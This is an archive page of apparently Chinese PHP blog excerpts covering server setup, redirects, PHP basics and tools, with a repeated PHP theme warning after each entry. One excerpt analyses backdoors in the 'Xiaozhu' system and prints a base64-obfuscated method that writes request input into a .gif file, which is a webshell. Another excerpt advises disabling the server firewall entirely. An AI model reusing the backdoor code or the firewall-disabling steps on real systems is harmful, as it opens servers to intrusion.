• 解决码科代驾PC和骑手端推送及声音问题

    1、服务器安全组开启9502端口 2、BT开启9502端口 3、关闭防火墙,小编的系统是Centos7.7 默认是开机防火墙的 systemctl status firewalld.service //查看防火墙状态 systemctl stop firewalld.service //停止防火墙 systemctl disable firewalld.service //禁用防火墙服务 3、用户端和骑手端小程序后台设置9502端口 BT计划脚本开机执行: cd /www/wwwroot/wx.wmphp.com/addon...阅读全文
    作者:admin | 分类:PHP, 微擎 | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • php统计IP PV和今日访问量

    php统计IP方法: php引用,在wordpress主题中 $getroot=$_SERVER['DOCUMENT_ROOT']; require_once("$getroot/countstart.php"); function getIpAddress() { // 取得当前用户的IP地址 $ip = '127.0.0.1'; if(isset($_SERVER)){ if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){ $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if(isset($_SERVER["HTTP...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP 301重定向

      <?php header("HTTP/1.1 301 Moved Permanently");//说明返回的是301 header("Location:http://www.wmphp.com");//重定向后的网址 ?> <meta http-equiv="refresh" content="0;url=http://blog.wmphp.com/" /> //HTML直接转向 阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • php编程 会员号和密码

    会员号12位,前6位为100508,后6位生成不含4的随机数;密码16位数字,生成1000个不重复的。 <?php //会员号不含4 function getRandStr($length) { $str = '012356789'; $randString = ''; $len = strlen($str)-1; for($i = 0;$i < $length;$i ++){ $num = mt_rand(0, $len); $randString .= $str[$num]; } return $randString ; } $chang='100508'; //password function getpwd($len...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • 小猪常见后门和漏洞

    后门一、查找文件TAction.class.php public function test(){ file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n'])); }* 执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif 这个文件虽然是104.gif,但它的内容却是由提交参数写入的。 后门二、 TagLib.class.php pub...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • WordPress 3.9“Smith”简体中文版下载

    今天,开源博客WordPress 3.9简体中文版现已开放下载,或在您的WordPress仪表盘中升级。本次WordPress 3.9命名为“Smith”,以纪念吉米·史密斯,爵士风琴家。这次发布包含了众多细部修改,推荐普通用户升级。   WordPress 3.9更新日志: • 更流畅的媒体编辑体验 • 改良的可视化编辑 新的可视化编辑器在速度、可用性、移动支持方面都有了进步。您现在可以从您的文字处理器中直接粘贴文...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP学习整理

    第23 字符串的处理 一、字符串的格式化 chop()函数移除字符串后面多余的空白,包括新行。//这个不重要 ltrim()函数移除字符串起始处多余空白。//只清理左边 rtrim()函数移除字符串后面多余的空白,包括新行,此函数是chop()的别名。//只清理右边 trim()函数移除字符串两边多余的空白。 <?php echo trim(' php '); ?> nl2br()函数将字符串作为输入参数,用XHTML中的<br />标记代...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • 非常实用的PHP在线解压缩程序

    一般我们通过FTP上传或者下载网站文件时,用于文件数量多的原因,FTP方式只能逐个目录查找,增加了反应时间,上传12M网站文件,需要30分钟,而且经常会遇到服务器断开,以及漏传等现像,通过PHP在线解压程序,同样是上传相同的文件,不超过3分钟即可完成整站上传或下载,可以完美解决该问题。一份ya.php用于压缩网站文件,还有一份phpzip用于压缩单个文件夹,和解压文件,效果图如下: &n...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • 万能密码重设工具

    程序下载地址:http://blog.wmphp.com/key_god.zip [更新纪录-2013.10.28] *版本升级为V1.1,加入本地锁定功能(当卸载失败的情况下将被锁定)并修正n个bug。 [更新纪录-2013.10.23] *增加"找回密码后自动强制卸载本程序"功能。 [更新纪录-2013.10.19] * “云端”加入支持HDwiki、Shopex策略。 [更新纪录-2013.10.18] * “云端”加入支持ECshop的策略,并更新Discuz_Ucenter策略。 Q:...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP初学者头痛的14个问题

    【1】面之间无法传递变量 get,post,session在最新的php 版本中自动全局变量是关闭的,所以要从上一面取得提交过来得变量要使用$_GET[’foo’],$_POST[’foo’],$_SESSION[’foo’]来得到。当然也可以修改自动全局变量为开(php .ini改为register_globals = On);考虑到兼容性,还是强迫自己熟悉新的写法比较好。 【2】Win下apache 用get方法传递中文参数会出错:   test.php ?a=你好&b=你也...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP执行系统命令简介

    在PHP中调用外部命令,可以用如下三种方法来实现: 方法一:用PHP提供的专门函数(四个): PHP提供4个专门的执行外部命令的函数:exec(), system(), passthru(), shell_exec() 1)exec() 原型: string exec ( string $command [, array &$output [, int &$return_var ]] ) 说明: exec执行系统外部命令时不会输出结果,而是返回结果的最后一行。如果想得到结果,可以使用第二个参数,让其输...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |